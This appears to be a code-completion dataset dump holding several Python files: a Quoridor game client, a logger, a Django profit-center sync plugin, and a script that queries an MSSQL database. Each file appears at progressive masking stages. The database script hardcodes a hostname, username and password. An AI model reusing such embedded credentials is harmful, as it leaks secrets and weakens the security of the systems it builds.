Pawn('black'), 'f3': Knight('white')})\n assert board.pieces_quantity() == 3\n\n knight = board.get_piece('f3')\n board.move('f3', 'e5')\n assert board.get_piece('e5') is knight\n assert board.pieces_quantity() == 2\n",
"step-ids": [
3,
7,
9,
10,
11
]
}
|
[
3,
7,
9,
10,
11
] |
'''Module main'''
import argparse
import api
import quoridor
import quoridorx
def analyser_commande():
'''Analyseur de ligne de commande.'''
parser = argparse.ArgumentParser(description='Jeu Quoridor - phase 3')
parser.add_argument("idul", help="IDUL du joueur.")
parser.add_argument("-l", '--lister', action='store_true',
help="Lister les identifiants de vos 20 dernières parties.")
# -a
parser.add_argument("-a", '--automatique', action='store_true',
help="Activer le mode automatique.")
# -x
parser.add_argument("-x", '--graphique', action='store_true',
help="Activer le mode graphique.")
return parser.parse_args()
if __name__ == "__main__":
COMMANDE = analyser_commande()
if COMMANDE.lister:
print(api.lister_parties(COMMANDE.idul))
# Mode automatique avec graphique (commande : python main.py -ax idul)
elif COMMANDE.automatique and COMMANDE.graphique:
DEBUTER = api.débuter_partie(COMMANDE.idul)
JEU = quoridorx.QuoridorX(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])
ID_PARTIE = DEBUTER[0]
JEU.afficher()
GAGNANT = True
while GAGNANT:
try:
COUP = JEU.jouer_coup(1)
JOUER = api.jouer_coup(ID_PARTIE, COUP[0], COUP[1])
JEU.liste_joueurs = JOUER['joueurs']
JEU.liste_murs = JOUER['murs']
JEU.afficher()
except StopIteration as err:
GAGNANT = False
print(f'Le gagnant est: {err}')
except RuntimeError as err:
print(err)
# Mode automatique (commande : python main.py -a idul)
elif COMMANDE.automatique:
DEBUTER = api.débuter_partie(COMMANDE.idul)
JEU = quoridor.Quoridor(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])
ID_PARTIE = DEBUTER[0]
print(JEU)
GAGNANT = True
while GAGNANT:
try:
COUP = JEU.jouer_coup(1)
JOUER = api.jouer_coup(ID_PARTIE, COUP[0], COUP[1])
JEU.liste_joueurs = JOUER['joueurs']
JEU.liste_murs = JOUER['murs']
print(JEU)
except StopIteration as err:
GAGNANT = False
print(f'Le gagnant est: {err}')
except RuntimeError as err:
print(err)
# Mode manuel avec graphique (commande : python main.py -x idul)
elif COMMANDE.graphique:
DEBUTER = api.débuter_partie(COMMANDE.idul)
JEU = quoridorx.QuoridorX(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])
ID_PARTIE = DEBUTER[0]
JEU.afficher()
GAGNANT = True
while GAGNANT:
OK_CHOIX = True
while OK_CHOIX:
CHOIX_COUP = input('Choisir votre coup("D","MH", "MV"): ')
POS = input('Entrer les coordonnées (x,y): ')
try:
JOUER = api.jouer_coup(ID_PARTIE, CHOIX_COUP, POS)
OK_CHOIX = False
JEU.liste_joueurs = JOUER['joueurs']
JEU.liste_murs = JOUER['murs']
JEU.afficher()
except StopIteration as err:
OK_CHOIX = False
GAGNANT = False
print(f'Le gagnant est: {err}')
except RuntimeError as err:
print(err)
# Mode manuel contre le serveur (commande : python main.py idul)
else:
DEBUTER = api.débuter_partie(COMMANDE.idul)
JEU = quoridor.Quoridor(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])
ID_PARTIE = DEBUTER[0]
print(JEU)
GAGNANT = True
while GAGNANT:
OK_CHOIX = True
while OK_CHOIX:
CHOIX_COUP = input('Choisir votre coup("D","MH", "MV"): ')
POS = input('Entrer les coordonnées (x,y): ')
try:
JOUER = api.jouer_coup(ID_PARTIE, CHOIX_COUP, POS)
OK_CHOIX = False
JEU.liste_joueurs = JOUER['joueurs']
JEU.liste_murs = JOUER['murs']
print(JEU)
except StopIteration as err:
OK_CHOIX = False
GAGNANT = False
print(f'Le gagnant est: {err}')
except RuntimeError as err:
print(err)
|
normal
|
{
"blob_id": "f69544a9123f1738cd7d21c1b4fc02dd73fb9d1b",
"index": 6008,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef analyser_commande():\n \"\"\"Analyseur de ligne de commande.\"\"\"\n parser = argparse.ArgumentParser(description='Jeu Quoridor - phase 3')\n parser.add_argument('idul', help='IDUL du joueur.')\n parser.add_argument('-l', '--lister', action='store_true', help=\n 'Lister les identifiants de vos 20 dernières parties.')\n parser.add_argument('-a', '--automatique', action='store_true', help=\n 'Activer le mode automatique.')\n parser.add_argument('-x', '--graphique', action='store_true', help=\n 'Activer le mode graphique.')\n return parser.parse_args()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef analyser_commande():\n \"\"\"Analyseur de ligne de commande.\"\"\"\n parser = argparse.ArgumentParser(description='Jeu Quoridor - phase 3')\n parser.add_argument('idul', help='IDUL du joueur.')\n parser.add_argument('-l', '--lister', action='store_true', help=\n 'Lister les identifiants de vos 20 dernières parties.')\n parser.add_argument('-a', '--automatique', action='store_true', help=\n 'Activer le mode automatique.')\n parser.add_argument('-x', '--graphique', action='store_true', help=\n 'Activer le mode graphique.')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n COMMANDE = analyser_commande()\n if COMMANDE.lister:\n print(api.lister_parties(COMMANDE.idul))\n elif COMMANDE.automatique and COMMANDE.graphique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridorx.QuoridorX(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n JEU.afficher()\n GAGNANT = True\n while GAGNANT:\n try:\n COUP = JEU.jouer_coup(1)\n JOUER = api.jouer_coup(ID_PARTIE, COUP[0], COUP[1])\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n JEU.afficher()\n except StopIteration as err:\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n elif COMMANDE.automatique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridor.Quoridor(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n print(JEU)\n GAGNANT = True\n while GAGNANT:\n try:\n COUP = JEU.jouer_coup(1)\n JOUER = api.jouer_coup(ID_PARTIE, COUP[0], COUP[1])\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n print(JEU)\n except StopIteration as err:\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n elif COMMANDE.graphique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridorx.QuoridorX(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n JEU.afficher()\n GAGNANT = True\n while GAGNANT:\n OK_CHOIX = True\n while OK_CHOIX:\n CHOIX_COUP = input('Choisir votre coup(\"D\",\"MH\", \"MV\"): ')\n POS = input('Entrer les coordonnées (x,y): ')\n try:\n JOUER = api.jouer_coup(ID_PARTIE, CHOIX_COUP, POS)\n OK_CHOIX = False\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n JEU.afficher()\n except StopIteration as err:\n OK_CHOIX = False\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n else:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridor.Quoridor(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n print(JEU)\n GAGNANT = True\n while GAGNANT:\n OK_CHOIX = True\n while OK_CHOIX:\n CHOIX_COUP = input('Choisir votre coup(\"D\",\"MH\", \"MV\"): ')\n POS = input('Entrer les coordonnées (x,y): ')\n try:\n JOUER = api.jouer_coup(ID_PARTIE, CHOIX_COUP, POS)\n OK_CHOIX = False\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n print(JEU)\n except StopIteration as err:\n OK_CHOIX = False\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n",
"step-4": "<mask token>\nimport argparse\nimport api\nimport quoridor\nimport quoridorx\n\n\ndef analyser_commande():\n \"\"\"Analyseur de ligne de commande.\"\"\"\n parser = argparse.ArgumentParser(description='Jeu Quoridor - phase 3')\n parser.add_argument('idul', help='IDUL du joueur.')\n parser.add_argument('-l', '--lister', action='store_true', help=\n 'Lister les identifiants de vos 20 dernières parties.')\n parser.add_argument('-a', '--automatique', action='store_true', help=\n 'Activer le mode automatique.')\n parser.add_argument('-x', '--graphique', action='store_true', help=\n 'Activer le mode graphique.')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n COMMANDE = analyser_commande()\n if COMMANDE.lister:\n print(api.lister_parties(COMMANDE.idul))\n elif COMMANDE.automatique and COMMANDE.graphique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridorx.QuoridorX(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n JEU.afficher()\n GAGNANT = True\n while GAGNANT:\n try:\n COUP = JEU.jouer_coup(1)\n JOUER = api.jouer_coup(ID_PARTIE, COUP[0], COUP[1])\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n JEU.afficher()\n except StopIteration as err:\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n elif COMMANDE.automatique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridor.Quoridor(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n print(JEU)\n GAGNANT = True\n while GAGNANT:\n try:\n COUP = JEU.jouer_coup(1)\n JOUER = api.jouer_coup(ID_PARTIE, COUP[0], COUP[1])\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n print(JEU)\n except StopIteration as err:\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n elif COMMANDE.graphique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridorx.QuoridorX(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n JEU.afficher()\n GAGNANT = True\n while GAGNANT:\n OK_CHOIX = True\n while OK_CHOIX:\n CHOIX_COUP = input('Choisir votre coup(\"D\",\"MH\", \"MV\"): ')\n POS = input('Entrer les coordonnées (x,y): ')\n try:\n JOUER = api.jouer_coup(ID_PARTIE, CHOIX_COUP, POS)\n OK_CHOIX = False\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n JEU.afficher()\n except StopIteration as err:\n OK_CHOIX = False\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n else:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridor.Quoridor(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n print(JEU)\n GAGNANT = True\n while GAGNANT:\n OK_CHOIX = True\n while OK_CHOIX:\n CHOIX_COUP = input('Choisir votre coup(\"D\",\"MH\", \"MV\"): ')\n POS = input('Entrer les coordonnées (x,y): ')\n try:\n JOUER = api.jouer_coup(ID_PARTIE, CHOIX_COUP, POS)\n OK_CHOIX = False\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n print(JEU)\n except StopIteration as err:\n OK_CHOIX = False\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n",
"step-5": "'''Module main'''\nimport argparse\nimport api\nimport quoridor\nimport quoridorx\n\n\ndef analyser_commande():\n '''Analyseur de ligne de commande.'''\n parser = argparse.ArgumentParser(description='Jeu Quoridor - phase 3')\n\n parser.add_argument(\"idul\", help=\"IDUL du joueur.\")\n\n parser.add_argument(\"-l\", '--lister', action='store_true',\n help=\"Lister les identifiants de vos 20 dernières parties.\")\n # -a\n parser.add_argument(\"-a\", '--automatique', action='store_true',\n help=\"Activer le mode automatique.\")\n # -x\n parser.add_argument(\"-x\", '--graphique', action='store_true',\n help=\"Activer le mode graphique.\")\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n COMMANDE = analyser_commande()\n\n if COMMANDE.lister:\n print(api.lister_parties(COMMANDE.idul))\n\n # Mode automatique avec graphique (commande : python main.py -ax idul)\n elif COMMANDE.automatique and COMMANDE.graphique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridorx.QuoridorX(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n\n JEU.afficher()\n\n GAGNANT = True\n while GAGNANT:\n try:\n COUP = JEU.jouer_coup(1)\n\n JOUER = api.jouer_coup(ID_PARTIE, COUP[0], COUP[1])\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n\n JEU.afficher()\n except StopIteration as err:\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n\n # Mode automatique (commande : python main.py -a idul)\n elif COMMANDE.automatique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridor.Quoridor(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n\n print(JEU)\n\n GAGNANT = True\n while GAGNANT:\n try:\n COUP = JEU.jouer_coup(1)\n\n JOUER = api.jouer_coup(ID_PARTIE, COUP[0], COUP[1])\n\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n\n print(JEU)\n except StopIteration as err:\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n # Mode manuel avec graphique (commande : python main.py -x idul)\n elif COMMANDE.graphique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridorx.QuoridorX(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n\n JEU.afficher()\n\n GAGNANT = True\n while GAGNANT:\n OK_CHOIX = True\n while OK_CHOIX:\n CHOIX_COUP = input('Choisir votre coup(\"D\",\"MH\", \"MV\"): ')\n POS = input('Entrer les coordonnées (x,y): ')\n\n try:\n JOUER = api.jouer_coup(ID_PARTIE, CHOIX_COUP, POS)\n\n OK_CHOIX = False\n\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n JEU.afficher()\n except StopIteration as err:\n OK_CHOIX = False\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n\n # Mode manuel contre le serveur (commande : python main.py idul)\n else:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridor.Quoridor(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n\n print(JEU)\n\n GAGNANT = True\n while GAGNANT:\n OK_CHOIX = True\n while OK_CHOIX:\n CHOIX_COUP = input('Choisir votre coup(\"D\",\"MH\", \"MV\"): ')\n POS = input('Entrer les coordonnées (x,y): ')\n\n try:\n JOUER = api.jouer_coup(ID_PARTIE, CHOIX_COUP, POS)\n\n OK_CHOIX = False\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n\n print(JEU)\n except StopIteration as err:\n OK_CHOIX = False\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
import argparse
import pymssql
import json
#get the lcmMediaId from DB.
def getMediaId(contentProviderMediaName):
#test db
conn = pymssql.connect(host='CHELLSSSQL23.karmalab.net', user='TravCatalog', password='travel', database='LodgingCatalogMaster_Phoenix')
#prod db
#conn = pymssql.connect(host='LodgingCatalogMaster.ch.expeso.com', user='TravCatalog', password='travel', database='LodgingCatalogMaster_Phoenix')
cur = conn.cursor()
cur.execute('SELECT * FROM media WHERE contentprovidermedianame =%s',contentProviderMediaName)
row = cur.fetchone()
mediaid = None
while row:
mediaid =row[0]
break
return mediaid
def main(messages_file, records):
print ('> Messages: %s; Records: %d' % (messages_file, records))
message_number = 0
with open(messages_file, 'r') as msgs_file:
for message in msgs_file:
if message_number >= records and records > 0:
break
if message.startswith('> '):
continue
try:
jsonMsg = json.loads(message)
mediaid = getMediaId(jsonMsg['fileName'])
if(mediaid != None):
jsonMsg['domainFields']['lcmMediaId']=str(mediaid)
print (json.dumps(jsonMsg))
except (RuntimeError, TypeError, NameError):
print ('> %s error' % message_number)
message_number += 1
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'messages_file', help='File with the messages to write. One message per line'
)
parser.add_argument(
'--records', default=-1, help='Number of messages to read'
)
args = parser.parse_args()
main(args.messages_file, int(args.records))
|
normal
|
{
"blob_id": "a5b7f565a1797e5f326bcf26ff7c8ad2469dca70",
"index": 7442,
"step-1": "<mask token>\n\n\ndef getMediaId(contentProviderMediaName):\n conn = pymssql.connect(host='CHELLSSSQL23.karmalab.net', user=\n 'TravCatalog', password='travel', database=\n 'LodgingCatalogMaster_Phoenix')\n cur = conn.cursor()\n cur.execute('SELECT * FROM media WHERE contentprovidermedianame =%s',\n contentProviderMediaName)\n row = cur.fetchone()\n mediaid = None\n while row:\n mediaid = row[0]\n break\n return mediaid\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef getMediaId(contentProviderMediaName):\n conn = pymssql.connect(host='CHELLSSSQL23.karmalab.net', user=\n 'TravCatalog', password='travel', database=\n 'LodgingCatalogMaster_Phoenix')\n cur = conn.cursor()\n cur.execute('SELECT * FROM media WHERE contentprovidermedianame =%s',\n contentProviderMediaName)\n row = cur.fetchone()\n mediaid = None\n while row:\n mediaid = row[0]\n break\n return mediaid\n\n\ndef main(messages_file, records):\n print('> Messages: %s; Records: %d' % (messages_file, records))\n message_number = 0\n with open(messages_file, 'r') as msgs_file:\n for message in msgs_file:\n if message_number >= records and records > 0:\n break\n if message.startswith('> '):\n continue\n try:\n jsonMsg = json.loads(message)\n mediaid = getMediaId(jsonMsg['fileName'])\n if mediaid != None:\n jsonMsg['domainFields']['lcmMediaId'] = str(mediaid)\n print(json.dumps(jsonMsg))\n except (RuntimeError, TypeError, NameError):\n print('> %s error' % message_number)\n message_number += 1\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef getMediaId(contentProviderMediaName):\n conn = pymssql.connect(host='CHELLSSSQL23.karmalab.net', user=\n 'TravCatalog', password='travel', database=\n 'LodgingCatalogMaster_Phoenix')\n cur = conn.cursor()\n cur.execute('SELECT * FROM media WHERE contentprovidermedianame =%s',\n contentProviderMediaName)\n row = cur.fetchone()\n mediaid = None\n while row:\n mediaid = row[0]\n break\n return mediaid\n\n\ndef main(messages_file, records):\n print('> Messages: %s; Records: %d' % (messages_file, records))\n message_number = 0\n with open(messages_file, 'r') as msgs_file:\n for message in msgs_file:\n if message_number >= records and records > 0:\n break\n if message.startswith('> '):\n continue\n try:\n jsonMsg = json.loads(message)\n mediaid = getMediaId(jsonMsg['fileName'])\n if mediaid != None:\n jsonMsg['domainFields']['lcmMediaId'] = str(mediaid)\n print(json.dumps(jsonMsg))\n except (RuntimeError, TypeError, NameError):\n print('> %s error' % message_number)\n message_number += 1\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('messages_file', help=\n 'File with the messages to write. One message per line')\n parser.add_argument('--records', default=-1, help=\n 'Number of messages to read')\n args = parser.parse_args()\n main(args.messages_file, int(args.records))\n",
"step-4": "import argparse\nimport pymssql\nimport json\n\n\ndef getMediaId(contentProviderMediaName):\n conn = pymssql.connect(host='CHELLSSSQL23.karmalab.net', user=\n 'TravCatalog', password='travel', database=\n 'LodgingCatalogMaster_Phoenix')\n cur = conn.cursor()\n cur.execute('SELECT * FROM media WHERE contentprovidermedianame =%s',\n contentProviderMediaName)\n row = cur.fetchone()\n mediaid = None\n while row:\n mediaid = row[0]\n break\n return mediaid\n\n\ndef main(messages_file, records):\n print('> Messages: %s; Records: %d' % (messages_file, records))\n message_number = 0\n with open(messages_file, 'r') as msgs_file:\n for message in msgs_file:\n if message_number >= records and records > 0:\n break\n if message.startswith('> '):\n continue\n try:\n jsonMsg = json.loads(message)\n mediaid = getMediaId(jsonMsg['fileName'])\n if mediaid != None:\n jsonMsg['domainFields']['lcmMediaId'] = str(mediaid)\n print(json.dumps(jsonMsg))\n except (RuntimeError, TypeError, NameError):\n print('> %s error' % message_number)\n message_number += 1\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('messages_file', help=\n 'File with the messages to write. One message per line')\n parser.add_argument('--records', default=-1, help=\n 'Number of messages to read')\n args = parser.parse_args()\n main(args.messages_file, int(args.records))\n",
"step-5": "#!/usr/bin/env python\nimport argparse\nimport pymssql\nimport json\n\n#get the lcmMediaId from DB.\ndef getMediaId(contentProviderMediaName):\n #test db\n conn = pymssql.connect(host='CHELLSSSQL23.karmalab.net', user='TravCatalog', password='travel', database='LodgingCatalogMaster_Phoenix')\n #prod db\n #conn = pymssql.connect(host='LodgingCatalogMaster.ch.expeso.com', user='TravCatalog', password='travel', database='LodgingCatalogMaster_Phoenix')\n cur = conn.cursor()\n cur.execute('SELECT * FROM media WHERE contentprovidermedianame =%s',contentProviderMediaName)\n row = cur.fetchone()\n mediaid = None\n while row:\n mediaid =row[0]\n break\n return mediaid\n\ndef main(messages_file, records):\n print ('> Messages: %s; Records: %d' % (messages_file, records))\n message_number = 0\n with open(messages_file, 'r') as msgs_file:\n for message in msgs_file:\n if message_number >= records and records > 0:\n break\n if message.startswith('> '):\n continue\n try:\n jsonMsg = json.loads(message)\n mediaid = getMediaId(jsonMsg['fileName'])\n if(mediaid != None):\n jsonMsg['domainFields']['lcmMediaId']=str(mediaid)\n print (json.dumps(jsonMsg))\n except (RuntimeError, TypeError, NameError):\n print ('> %s error' % message_number)\n message_number += 1\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'messages_file', help='File with the messages to write. One message per line'\n )\n parser.add_argument(\n '--records', default=-1, help='Number of messages to read'\n )\n args = parser.parse_args()\n main(args.messages_file, int(args.records))\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
"""For logging training information to files."""
import os
def delete_log(file_path):
"""Delete a log file.
Args:
file_path: String, the full path to the log file.
Raises:
ValueError: if file not found.
"""
if os.path.exists(file_path):
print('Deleting log %s...' % file_path)
os.remove(file_path)
else:
raise ValueError("File %r doesn't exists - cannot delete." % file_path)
class Logger:
"""For logging information to file."""
def __init__(self, file_path, print_too=True, override=False):
"""Create a new Logger.
Args:
file_path: String, the full path to the target file.
print_too: Bool, whether or not to also print logger info to terminal.
override: Bool, whether or not to delete any old files.
"""
self.file_path = file_path
self.print_too = print_too
if override:
if os.path.exists(file_path):
print('Overriding - deleting previous log...')
os.remove(file_path)
os.makedirs(os.path.dirname(file_path), exist_ok=True)
def log(self, info):
with open(self.file_path, 'a') as file:
file.write('\n' + info)
if self.print_too:
print(info)
|
normal
|
{
"blob_id": "1355c3abfd2683f6dc869703fdb79a04e264099c",
"index": 3421,
"step-1": "<mask token>\n\n\nclass Logger:\n <mask token>\n\n def __init__(self, file_path, print_too=True, override=False):\n \"\"\"Create a new Logger.\n\n Args:\n file_path: String, the full path to the target file.\n print_too: Bool, whether or not to also print logger info to terminal.\n override: Bool, whether or not to delete any old files.\n \"\"\"\n self.file_path = file_path\n self.print_too = print_too\n if override:\n if os.path.exists(file_path):\n print('Overriding - deleting previous log...')\n os.remove(file_path)\n os.makedirs(os.path.dirname(file_path), exist_ok=True)\n\n def log(self, info):\n with open(self.file_path, 'a') as file:\n file.write('\\n' + info)\n if self.print_too:\n print(info)\n",
"step-2": "<mask token>\n\n\nclass Logger:\n \"\"\"For logging information to file.\"\"\"\n\n def __init__(self, file_path, print_too=True, override=False):\n \"\"\"Create a new Logger.\n\n Args:\n file_path: String, the full path to the target file.\n print_too: Bool, whether or not to also print logger info to terminal.\n override: Bool, whether or not to delete any old files.\n \"\"\"\n self.file_path = file_path\n self.print_too = print_too\n if override:\n if os.path.exists(file_path):\n print('Overriding - deleting previous log...')\n os.remove(file_path)\n os.makedirs(os.path.dirname(file_path), exist_ok=True)\n\n def log(self, info):\n with open(self.file_path, 'a') as file:\n file.write('\\n' + info)\n if self.print_too:\n print(info)\n",
"step-3": "<mask token>\n\n\ndef delete_log(file_path):\n \"\"\"Delete a log file.\n\n Args:\n file_path: String, the full path to the log file.\n\n Raises:\n ValueError: if file not found.\n \"\"\"\n if os.path.exists(file_path):\n print('Deleting log %s...' % file_path)\n os.remove(file_path)\n else:\n raise ValueError(\"File %r doesn't exists - cannot delete.\" % file_path\n )\n\n\nclass Logger:\n \"\"\"For logging information to file.\"\"\"\n\n def __init__(self, file_path, print_too=True, override=False):\n \"\"\"Create a new Logger.\n\n Args:\n file_path: String, the full path to the target file.\n print_too: Bool, whether or not to also print logger info to terminal.\n override: Bool, whether or not to delete any old files.\n \"\"\"\n self.file_path = file_path\n self.print_too = print_too\n if override:\n if os.path.exists(file_path):\n print('Overriding - deleting previous log...')\n os.remove(file_path)\n os.makedirs(os.path.dirname(file_path), exist_ok=True)\n\n def log(self, info):\n with open(self.file_path, 'a') as file:\n file.write('\\n' + info)\n if self.print_too:\n print(info)\n",
"step-4": "<mask token>\nimport os\n\n\ndef delete_log(file_path):\n \"\"\"Delete a log file.\n\n Args:\n file_path: String, the full path to the log file.\n\n Raises:\n ValueError: if file not found.\n \"\"\"\n if os.path.exists(file_path):\n print('Deleting log %s...' % file_path)\n os.remove(file_path)\n else:\n raise ValueError(\"File %r doesn't exists - cannot delete.\" % file_path\n )\n\n\nclass Logger:\n \"\"\"For logging information to file.\"\"\"\n\n def __init__(self, file_path, print_too=True, override=False):\n \"\"\"Create a new Logger.\n\n Args:\n file_path: String, the full path to the target file.\n print_too: Bool, whether or not to also print logger info to terminal.\n override: Bool, whether or not to delete any old files.\n \"\"\"\n self.file_path = file_path\n self.print_too = print_too\n if override:\n if os.path.exists(file_path):\n print('Overriding - deleting previous log...')\n os.remove(file_path)\n os.makedirs(os.path.dirname(file_path), exist_ok=True)\n\n def log(self, info):\n with open(self.file_path, 'a') as file:\n file.write('\\n' + info)\n if self.print_too:\n print(info)\n",
"step-5": "\"\"\"For logging training information to files.\"\"\"\nimport os\n\n\ndef delete_log(file_path):\n \"\"\"Delete a log file.\n\n Args:\n file_path: String, the full path to the log file.\n\n Raises:\n ValueError: if file not found.\n \"\"\"\n if os.path.exists(file_path):\n print('Deleting log %s...' % file_path)\n os.remove(file_path)\n else:\n raise ValueError(\"File %r doesn't exists - cannot delete.\" % file_path)\n\n\nclass Logger:\n \"\"\"For logging information to file.\"\"\"\n\n def __init__(self, file_path, print_too=True, override=False):\n \"\"\"Create a new Logger.\n\n Args:\n file_path: String, the full path to the target file.\n print_too: Bool, whether or not to also print logger info to terminal.\n override: Bool, whether or not to delete any old files.\n \"\"\"\n self.file_path = file_path\n self.print_too = print_too\n if override:\n if os.path.exists(file_path):\n print('Overriding - deleting previous log...')\n os.remove(file_path)\n os.makedirs(os.path.dirname(file_path), exist_ok=True)\n\n def log(self, info):\n with open(self.file_path, 'a') as file:\n file.write('\\n' + info)\n if self.print_too:\n print(info)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
from django.db import transaction
from ralph_scrooge.models import ProfitCenter
from ralph_scrooge.plugins import plugin_runner
from ralph_scrooge.plugins.collect.utils import get_from_ralph
logger = logging.getLogger(__name__)
@transaction.atomic
def update_profit_center(pc):
profit_center, created = ProfitCenter.objects.get_or_create(
ralph3_id=pc['id'],
defaults=dict(
name=pc['name'],
)
)
profit_center.name = pc['name']
profit_center.description = pc['description']
profit_center.save()
return created
@plugin_runner.register(chain='scrooge')
def ralph3_profit_center(**kwargs):
new_pc = total = 0
for pc in get_from_ralph("profit-centers", logger):
created = update_profit_center(pc)
if created:
new_pc += 1
total += 1
return True, '{} new profit center(s), {} updated, {} total'.format(
new_pc,
total - new_pc,
total,
)
|
normal
|
{
"blob_id": "d3f52d4713ba4b7b4cd736b26809968e259be63c",
"index": 6883,
"step-1": "<mask token>\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph('profit-centers', logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(new_pc,\n total - new_pc, total)\n",
"step-2": "<mask token>\n\n\[email protected]\ndef update_profit_center(pc):\n profit_center, created = ProfitCenter.objects.get_or_create(ralph3_id=\n pc['id'], defaults=dict(name=pc['name']))\n profit_center.name = pc['name']\n profit_center.description = pc['description']\n profit_center.save()\n return created\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph('profit-centers', logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(new_pc,\n total - new_pc, total)\n",
